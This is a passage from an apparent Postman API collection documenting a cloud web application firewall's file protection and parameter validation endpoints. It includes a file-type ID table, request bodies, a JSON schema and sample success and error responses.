</tr>\n<tr>\n    <td>00090</td>\n    <td>Microsoft Office Word(.doc)</td>\n  </tr>\n<tr>\n    <td>00091</td>\n    <td>Microsoft Office Excel(.xls)</td>\n  </tr>\n<tr>\n    <td>00092</td>\n    <td>Microsoft Office PowerPoint(.ppt)</td>\n  </tr>\n<tr>\n    <td>00093</td>\n    <td>Hancom Office Hanword(.hwp)</td>\n  </tr>\n<tr>\n    <td>00005</td>\n    <td>MP3</td>\n  </tr>\n<tr>\n    <td>00006</td>\n    <td>MIDI</td>\n  </tr>\n<tr>\n    <td>00007</td>\n    <td>WAVE</td>\n  </tr>\n<tr>\n    <td>00031</td>\n    <td>Apple CoreAudio(.caf)</td>\n  </tr>\n<tr>\n    <td>00037</td>\n    <td>Microsoft Advanced Streaming(.asf)</td>\n  </tr>\n<tr>\n    <td>00039</td>\n    <td>Real Audio File(.ra)</td>\n  </tr>\n<tr>\n    <td>00044</td>\n    <td>Apple Lossless Audio(.m4a)</td>\n  </tr>\n<tr>\n    <td>00052</td>\n    <td>Digital Speech Standard(.dss)</td>\n  </tr>\n<tr>\n    <td>00011</td>\n    <td>Real Media File(.rm)</td>\n  </tr>\n<tr>\n    <td>00012</td>\n    <td>MPEG v4</td>\n  </tr>\n<tr>\n    <td>00013</td>\n    <td>3GPP</td>\n  </tr>\n<tr>\n    <td>00015</td>\n    <td>AVI</td>\n  </tr>\n<tr>\n    <td>00020</td>\n    <td>Macromedia Flash</td>\n  </tr>\n<tr>\n    <td>00035</td>\n    <td>Windows Animated Cursor</td>\n  </tr>\n<tr>\n    <td>00045</td>\n    <td>DVD Video Movie File(.vob)</td>\n  </tr>\n<tr>\n    <td>00008</td>\n    <td>RAR</td>\n  </tr>\n<tr>\n    <td>00009</td>\n    <td>ZIP</td>\n  </tr>\n<tr>\n    <td>00017</td>\n    <td>TAR</td>\n  </tr>\n<tr>\n    <td>00025</td>\n    <td>7-ZIP</td>\n  </tr>\n<tr>\n    <td>00027</td>\n    <td>Debian Package</td>\n  </tr>\n<tr>\n    <td>00029</td>\n    <td>Microsoft Cabinet File</td>\n  </tr>\n<tr>\n    <td>00033</td>\n    <td>Unix Archiver File(.ar)</td>\n  </tr>\n <td>00034</td>\n    <td>Installshield Cabinet Archive Data</td>\n  \n<tr>\n    <td>00040</td>\n    <td>AIN Archive Data(.ain)</td>\n  </tr>\n<tr>\n    <td>00041</td>\n    <td>BZIP2 Archive(.bz2)</td>\n  </tr>\n<tr>\n    <td>00057</td>\n    <td>WinZIP ZIPX Archive(ZIPx)</td>\n  </tr>\n<tr>\n    <td>00058</td>\n    <td>Gzipped Tape Archive(TGZ)</td>\n  </tr>\n<tr>\n    <td>00094</td>\n    <td>TXT(.txt)</td>\n  </tr>\n<tr>\n    <td>00095</td>\n    <td>ZIP(.zip)</td>\n  </tr>\n<tr>\n    <td>00096</td>\n    <td>7-ZIP(.7z)</td>\n  </tr>\n<tr>\n    <td>00097</td>\n    <td>Debian Package(.pkg)</td>\n  </tr>\n<tr>\n    <td>00098</td>\n    <td>Unix Archiver File(.ar)</td>\n  </tr>\n<tr>\n    <td>00099</td>\n    <td>AIN Archive Data(.ain)</td>\n  </tr>\n<tr>\n    <td>00100</td>\n    <td>BZIP2 Archive(.bz2)</td>\n  </tr>\n<tr>\n    <td>00101</td>\n    <td>Gzipped Tape Archive(.tgz)</td>\n  </tr>\n<tr>\n    <td>00102</td>\n    <td>Word(.docx)</td>\n  </tr>\n<tr>\n    <td>00103</td>\n    <td>Word Macro-Enabled(.docm)</td>\n  </tr>\n<tr>\n    <td>00104</td>\n    <td>Word Template(.dotx)</td>\n  </tr>\n<tr>\n    <td>00105</td>\n    <td>Word Macro-Enabled Template(.dotm)</td>\n  </tr>\n<tr>\n    <td>00106</td>\n    <td>Excel(.xlsx)</td>\n  </tr>\n  <tr>\n    <td>00107</td>\n    <td>Excel Macro-Enabled(.xlsm)</td>\n  </tr>\n<tr>\n    <td>00108</td>\n    <td>Excel Template(.xltx)</td>\n  </tr>\n<tr>\n    <td>00109</td>\n    <td>Excel Macro-Enabled Template(.xltm)</td>\n  </tr>\n<tr>\n    <td>00110</td>\n    <td>Excel Add-In(.xlam)</td>\n  </tr>\n<tr>\n    <td>00111</td>\n    <td>PPT(.pptx)</td>\n  </tr>\n<tr>\n    <td>00112</td>\n    <td>PPT Macro-Enabled(.pptm)</td>\n  </tr>\n<tr>\n    <td>00113</td>\n    <td>PPT Template(.potx)</td>\n  </tr>\n<tr>\n    <td>00114</td>\n    <td>PPT Macro-Enabled Template(.potm)</td>\n  </tr>\n<tr>\n    <td>00115</td>\n    <td>PPT Add-In(.ppam)</td>\n  </tr>\n<tr>\n    <td>00116</td>\n    <td>PPT Show(.ppsx)</td>\n  </tr>\n<tr>\n    <td>00117</td>\n    <td>PPT Macro-Enabled Show(.ppsm)</td>\n  </tr>\n<tr>\n    <td>00118</td>\n    <td>Visio Drawing(.vsdx)</td>\n  </tr>\n<tr>\n    <td>00119</td>\n    <td>Visio Macro-Enabled Drawing(.vsdm)</td>\n  </tr>\n<tr>\n    <td>00120</td>\n    <td>Visio Stencil(.vssx)</td>\n  </tr>\n<tr>\n    <td>00121</td>\n    <td>Visio Macro-Enabled Stencil(.vssm)</td>\n  </tr>\n<tr>\n    <td>00122</td>\n    <td>Visio Template(.vstx)</td>\n  </tr>\n<tr>\n    <td>00123</td>\n    <td>Visio Macro-Enabled Template(.vstm)</td>\n  </tr>\n<tr>\n    <td>00124</td>\n    <td>PDF(.pdf)</td>\n  </tr>\n<tr>\n    <td>00125</td>\n    <td>XML(.xml)</td>\n  </tr>\n<tr>\n    <td>00126</td>\n    <td>EXE(.exe)</td>\n  </tr>\n<tr>\n    <td>00127</td>\n    <td>Rich Text Format(.rtf)</td>\n  </tr>\n<tr>\n    <td>00128</td>\n    <td>Windows Help File(.hlp)</td>\n  </tr>\n<tr>\n    <td>00129</td>\n    <td>Windows Mobile Note(.pwi)</td>\n  </tr>\n<tr>\n    <td>00130</td>\n    <td>Windows Registry Text(.reg)</td>\n  </tr>\n<tr>\n    <td>00131</td>\n    <td>SQL Server 2000 Database(.mdf)</td>\n  </tr>\n<tr>\n    <td>00132</td>\n    <td>Java Archive(.jar)</td>\n  </tr>\n<tr>\n    <td>00133</td>\n    <td>Windows Printer Spool File(.shd)</td>\n  </tr>\n<tr>\n    <td>00134</td>\n    <td>Windows Shortcut File(.lnk)</td>\n  </tr>\n<tr>\n    <td>00135</td>\n    <td>Quark Express Document(.qxd)</td>\n  </tr>\n<tr>\n    <td>00136</td>\n    <td>Windows MS Info File(.mof)</td>\n  </tr>\n<tr>\n    <td>00137</td>\n    <td>Microsoft Access Database(.MDB)</td>\n  </tr>\n<tr>\n    <td>00138</td>\n    <td>SPSS Data(.SAV)</td>\n  </tr>\n<tr>\n    <td>00139</td>\n    <td>RedHat Package Manager file(.RPM)</td>\n  </tr>\n<tr>\n    <td>00140</td>\n    <td>VMware Virtual Disk File(.vmdk)</td>\n  </tr>\n<tr>\n    <td>00141</td>\n    <td>Adobe encapsulated PostScript file(.EPS)</td>\n  </tr>\n<tr>\n    <td>00142</td>\n    <td>SPSS Data(.SAV)</td>\n  </tr>\n<tr>\n    <td>00145</td>\n    <td>Lotus 1-2-3 spreadsheet(.WK)</td>\n  </tr>\n<tr>\n    <td>00146</td>\n    <td>SkinCrafter skin file(.skf)</td>\n  </tr>\n<tr>\n    <td>00147</td>\n    <td>Nero CD Compilation(.NRI)</td>\n  </tr>\n<tr>\n    <td>00148</td>\n    <td>Microsoft Office Word(.doc)</td>\n  </tr>\n<tr>\n    <td>00149</td>\n    <td>Microsoft Office Excel(.xls)</td>\n  </tr>\n<tr>\n    <td>00150</td>\n    <td>Microsoft Office PowerPoint(.ppt)</td>\n  </tr>\n<tr>\n    <td>00151</td>\n    <td>Hancom Office Hanword(.hwp)</td>\n  </tr>\n<tr>\n    <td>00152</td>\n    <td>PHP(.php)</td>\n  </tr>\n<tr>\n    <td>00153</td>\n    <td>JSP(.jsp)</td>\n  </tr>\n<tr>\n    <td>00154</td>\n    <td>ASPX(.aspx)</td>\n  </tr>\n<tr>\n    <td>00155</td>\n    <td>GIF(.gif)</td>\n  </tr>\n<tr>\n    <td>00156</td>\n    <td>JPG(.jpg)</td>\n  </tr>\n<tr>\n    <td>00157</td>\n    <td>BMP(.bmp)</td>\n  </tr>\n<tr>\n    <td>00158</td>\n    <td>SPSS Data(.SAV)</td>\n  </tr>\n<tr>\n    <td>00159</td>\n    <td>Windows Metafile Format(.wmf)</td>\n  </tr>\n<tr>\n    <td>00160</td>\n    <td>Windows Icon(.icon)</td>\n  </tr>\n<tr>\n    <td>00161</td>\n    <td>Microsoft Document Image(.mdi)</td>\n  </tr>\n<tr>\n    <td>00162</td>\n    <td>Windows Enhanced Metafile(.emf)</td>\n  </tr>\n<tr>\n    <td>00163</td>\n    <td>Photoshop Image File(.psd)</td>\n  </tr>\n<tr>\n    <td>00164</td>\n    <td>JPEG-2000 Image File Format(.jp2)</td>\n  </tr>\n<tr>\n    <td>00165</td>\n    <td>Multipage PCX Bitmap File(.dcx)(.SAV)</td>\n  </tr>\n<tr>\n    <td>00166</td>\n    <td>SQL(.sql)</td>\n  </tr>\n</table>\n\n\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","fileprotection"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"6a2b2bd8-c16a-4e57-b536-0a0571f8c3c7","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"FileUploadRule\": {\n        \"type\": \"Allow\",\n        \"file-size-limit\": 0,\n        \"request-file\": \"/\",\n        \"file-types\": [{\"file-type-name\": \"BMP\", \"file-type-id\": \"00010\"}]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/file-protection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","file-protection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:18:22 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"64"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"1d07e703-7df4-11e9-b7a4-49a6c523fae5"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLUdwGbBoAMFSHA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79abe-241b7110faf13d248f96e2fc;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Unsupported method or error key 'file-protection'!\"\n}"},{"id":"73ef164d-23be-422b-9452-4bca8d6a7c06","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"disable\",\n    \"FileProtection\": {\n        \"trojan-detection\": \"enable\",\n        \"timsandbox-check\": \"disable\",\n        \"av-scan\": \"enable\"\n    },\n    \"FileUploadRule\": {\n        \"type\": \"Allow\",\n        \"file-size-limit\": 0,\n        \"request-file\": \"/\",\n        \"file-types\": [{\"file-type-name\": \"BMP\", \"file-type-id\": \"00010\"}]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/fileprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","fileprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:11:45 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"300772c4-7df3-11e9-a399-e76e06397580"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLTfnHUZIAMFfFw="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce79930-47d9cb5a965c9cc8473929b0;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"d5a2c1e2-8efd-4619-b1ec-a2c9d63c8b1b","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"disable\",\n    \"FileProtection\": {\n        \"trojan-detection\": \"enable\",\n        \"timsandbox-check\": \"disable\",\n        \"av-scan\": \"enable\"\n    },\n    \"FileUploadRule\": {\n        \"type\": \"invalid\",\n        \"file-size-limit\": 0,\n        \"request-file\": \"/\",\n        \"file-types\": [{\"file-type-name\": \"BMP\", \"file-type-id\": \"00010\"}]\n    }\n}"},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/fileprotection","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","fileprotection"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Fri, 24 May 2019 07:13:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"88"},{"key":"Connection","value":"keep-alive"},{"key":"x-amzn-RequestId","value":"66e06e5c-7df3-11e9-9e04-5d44b53a2be0"},{"key":"Access-Control-Allow-Origin","value":"https://tim.waasonline.com"},{"key":"x-amz-apigw-id","value":"aLTuAEkCoAMFUNQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce7998c-192532f07f552aa294ec1516;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"Check failed: {'type': \\\"Error enum type, only allow ['Allow', 'Block']\\\"}\"\n}"}],"_postman_id":"a6565b14-159c-4d0f-8b6a-6d3bd160d7c9"},{"name":"Get Parameter Validation","id":"36819659-0f28-4f22-bf70-e83c96858e25","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","description":"<p>Get the information of Parameter Validation.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.}</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","parametervalidation"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"01546aac-00fa-47b2-aff6-6598c77d9d76","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"any","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"f3f4cf5d-f118-4630-958a-19031a7ed0bc","name":"Success","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","parametervalidation"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:16:07 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"233"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"22f5e563-7acf-11e9-a7bf-51b0e9db0d2d"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amz-apigw-id","value":"Z-IYqF6XoAMFjxQ="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce25437-a6ce3cdc0b385f28181e38f6;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"_status\": \"enable\",\n        \"InputRule\": [\n            {\n                \"name\": \"test\",\n                \"action\": \"alert\",\n                \"request-file\": \"/.*\",\n                \"rule-list\": [\n                    {\n                        \"argument-name\": \"para1\",\n                        \"is-essential\": \"enable\",\n                        \"type-checked\": \"enable\",\n                        \"max-length\": 0,\n                        \"argument-type\": \"data-type\",\n                        \"data-type\": \"Num\",\n                        \"id\": \"1\"\n                    },\n                    {\n                        \"argument-name\": \"para2\",\n                        \"argument-expression\": \"regexp\",\n                        \"is-essential\": \"disable\",\n                        \"type-checked\": \"enable\",\n                        \"max-length\": 10,\n                        \"argument-type\": \"regular-expression\",\n                        \"id\": \"2\"\n                    }\n                ]\n            }\n        ]\n    }\n}"},{"id":"b4f6044a-24a4-479a-8309-93de790aabb2","name":"Fail","originalRequest":{"method":"GET","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","parametervalidation"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Mon, 20 May 2019 07:07:21 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"e96511e7-7acd-11e9-83f5-0bb6ecbdb2f6"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"Z-HGeFjEoAMFUgQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"}],"_postman_id":"36819659-0f28-4f22-bf70-e83c96858e25"},{"name":"Update Parameter Validation","id":"7814128f-e557-4f36-9f65-8a3acb30524c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"description":"<p>Token</p>\n","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"InputRule\": [\n        {\n            \"name\": \"test\",\n            \"request-file\": \"/.*\",\n            \"action\": \"alert\",\n            \"block-period\": 60,\n            \"rule-list\": [\n                {\n                    \"argument-name\": \"para1\",\n                    \"max-length\": 0,\n                    \"is-essential\": \"enable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"data-type\",\n                    \"data-type\": \"Num\"\n                },\n                {\n                    \"argument-name\": \"para2\",\n                    \"max-length\": 10,\n                    \"is-essential\": \"disable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"regular-expression\",\n                    \"argument-expression\": \"regexp\"\n                }\n            ]\n        }\n    ]\n}"},"url":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","description":"<p>Update the information about the Parameter Validation.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:</p>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\"_status\"],\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable parameter validation\",\n            \"type\": \"string\",\n            \"enum\": [\"enable\", \"disable\"],\n            \"default\": \"disable\"\n        },\n        \"InputRule\": {\n            \"description\": \"The parameter validation list\",\n            \"type\": \"array\",\n            \"maxItem\": 12,\n            \"items\": {\n                \"type\": \"object\",\n                \"required\": [\"name\", \"request-file\", \"action\"],\n                \"properties\": {\n                    \"name\": {\n                        \"description\": \"Name of parameter validation rule\",\n                        \"type\": \"string\"\n                    },\n                    \"request-file\": {\n                        \"description\": \"The URL which hosts the web page containing the user input fields you want to protect\",\n                        \"type\": \"string\"\n                    },\n                    \"action\": {\n                        \"description\": \"Select which action FortiWeb will take when it detects a violation of the parameter validation rule\",\n                        \"type\": \"string\",\n                        \"enum\": [\"alert\", \"alert_deny\", \"block_period\", \"deny_no_log\", \"redirect\"],\n                        \"default\": \"alert\"\n                    },\n                    \"block-period\": {\n                        \"description\": \"The number of seconds that you want to block subsequent requests from the client after detecting the client has violated the rule\",\n                        \"type\": \"integer\",\n                        \"minimum\": 1,\n                        \"maximum\": 3600,\n                        \"default\": 60\n                    },\n                    \"rule-list\": {\n                        \"description\": \"The parameter rule list\",\n                        \"type\": \"array\",\n                        \"maxItem\": 60,\n                        \"items\": {\n                            \"type\": \"object\",\n                            \"required\": [\"argument-name\", \"max-length\", \"is-essential\", \"type-checked\"],\n                            \"properties\": {\n                                \"argument-name\": {\n                                    \"description\": \"A regular expression that matches the name attribute of the parameter’s input tag\",\n                                    \"type\": \"string\"\n                                },\n                                \"max-length\": {\n                                    \"description\": \"The maximum length of the string that is the input’s value. To disable the length limit, type 0.\",\n                                    \"type\": \"integer\",\n                                    \"minimum\": 0,\n                                    \"maximum\": 1024,\n                                    \"default\": 0\n                                },\n                                 \"is-essential\": {\n                                    \"description\": \"Enable if the parameter is required for HTTP/HTTPS requests to this combination of field and URL.\",\n                                    \"type\": \"string\",\n                                    \"enum\": [\"enable\", \"disable\"],\n                                    \"default\": \"disable\"\n                                },\n                                \"type-checked\": {\n                                    \"description\": \"Enable to validate the data type of the parameter.\",\n                                    \"type\": \"string\",\n                                    \"enum\": [\"enable\", \"disable\"],\n                                    \"default\": \"disable\"\n                                },\n                                \"argument-type\": {\n                                    \"description\": \"The type of parameter. This option is only available when type-checked is enable.\",\n                                    \"type\": \"string\",\n                                    \"enum\": [\"data-type\", \"regular-expression\"],\n                                    \"default\": \"data-type\"\n                                },\n                                \"data-type\": {\n                                    \"description\": \"Select a predefined data type. This option is only available when argument-type is data-type.\",\n                                    \"type\": \"string\",\n                                    \"enum\": [\"Email\", \"Uri\", \"Num\", \"String\", \"Dates_and_Times\", \"Address\", \"Phone\", \"Markup_or_Code\", \"Credit_Card_Number\", \"US_Zip_Code\", \"US_State_Name\", \"Canadian_Post_code\", \"Canadian_Province_Name\", \"Country_Name\", \"China_Post_Code\", \"US_SSN\", \"Canadian_SIN\", \"L1_Password\", \"L2_Password\", \"ip_address\", \"personal_name\", \"UK_Bank_code\", \"GPA\", \"NINO\", \"Unix_device_name\", \"Microsoft_product_key\", \"GUID\", \"Windows_file_name\", \"Indian_Vehicle_Number\", \"Swedish_personal_number\", \"UAE_land_phone\", \"Kuwait_Civil_ID\", \"US_Street_Address\", \"Netherlands_Postcode\", \"Danmark_Postalcode\", \"UK_postcode\", \"Swedish_Postalcode\", \"Italian_mobile_phone\", \"Quebec_Postal_Code\", \"Australian_Phone_Numbers\", \"Post_Office_Box\", \"South_African_Mobile_Phone\", \"UK_Vehicle_Registration\", \"Spanish_ID_DNI\", \"Aadhaar_Card\", \"PAN_Card\"]\n                                },\n                                \"argument-expression\": {\n                                    \"description\": \"Type a regular expression that matches all valid values, and no invalid values, for this input. This option is only available when argument-type is regular-expression.\",\n                                    \"type\": \"string\"\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    }\n}\n</code></pre>\n<p>After you update the configuration, the API will return successfully.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","parametervalidation"],"host":["api","fortiweb-cloud","com"],"query":[],"variable":[{"id":"8400abfa-32d9-4787-b47d-6366bada6519","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"fc75768c-6018-41a3-b92b-76e7cf3361ef","name":"Success","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"InputRule\": [\n        {\n            \"name\": \"test\",\n            \"request-file\": \"/.*\",\n            \"action\": \"alert\",\n            \"block-period\": 60,\n            \"rule-list\": [\n                {\n                    \"argument-name\": \"para1\",\n                    \"max-length\": 0,\n                    \"is-essential\": \"enable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"data-type\",\n                    \"data-type\": \"Num\"\n                },\n                {\n                    \"argument-name\": \"para2\",\n                    \"max-length\": 10,\n                    \"is-essential\": \"disable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"regular-expression\",\n                    \"argument-expression\": \"regexp\"\n                }\n            ]\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","parametervalidation"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:36:41 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"26"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"4356226f-7b71-11e9-bf78-e7093f808c20"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amz-apigw-id","value":"aAyYyG4aoAMF8AA="},{"key":"X-Amzn-Trace-Id","value":"Root=1-5ce36438-d59d6f38f1597dd0eaff4a74;Sampled=0"}],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"c8612dbf-9019-4e4a-90f8-c369d1d65ace","name":"Fail","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"InputRule\": [\n        {\n            \"name\": \"test\",\n            \"request-file\": \"/.*\",\n            \"action\": \"alert\",\n            \"block-period\": 60,\n            \"rule-list\": [\n                {\n                    \"argument-name\": \"para1\",\n                    \"max-length\": 0,\n                    \"is-essential\": \"enable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"data-type\",\n                    \"data-type\": \"Num\"\n                },\n                {\n                    \"argument-name\": \"para2\",\n                    \"max-length\": 10,\n                    \"is-essential\": \"disable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"regular-expression\",\n                    \"argument-expression\": \"regexp\"\n                }\n            ]\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","parametervalidation"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Forbidden","code":403,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:31:49 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"65"},{"key":"Connection","value":"close"},{"key":"x-amzn-RequestId","value":"95eafe53-7b70-11e9-9df0-bf2e74ae9a1b"},{"key":"Access-Control-Allow-Origin","value":"https://www.fortiweb-cloud.com"},{"key":"x-amzn-ErrorType","value":"AccessDeniedException"},{"key":"x-amz-apigw-id","value":"aAxrVF6XIAMFrXQ="}],"cookie":[],"responseTime":null,"body":"{\n    \"message\": \"HTTP method, resources or permissions not supported\"\n}"},{"id":"56a13bc6-aefb-451f-bc8b-b068c4702a86","name":"Parameter Invalid","originalRequest":{"method":"PUT","header":[{"description":"Token","key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\n    \"_status\": \"enable\",\n    \"InputRule\": [\n        {\n            \"name\": \"test\",\n            \"request-file\": \"/.*\",\n            \"action\": \"alert\",\n            \"block-period\": 60,\n            \"rule-list\": [\n                {\n                    \"argument-name\": \"para1\",\n                    \"max-length\": 0,\n                    \"is-essential\": \"enable\",\n                    \"type-checked\": \"enable\",\n                    \"argument-type\": \"datatype\",\n                    \"data-type\": \"Num\"\n                }\n            ]\n        }\n    ]\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.fortiweb-cloud.com/v1/application/:ep_id/parametervalidation","protocol":"https","host":["api","fortiweb-cloud","com"],"path":["v1","application",":ep_id","parametervalidation"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The endpoint id."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 21 May 2019 02:37:52 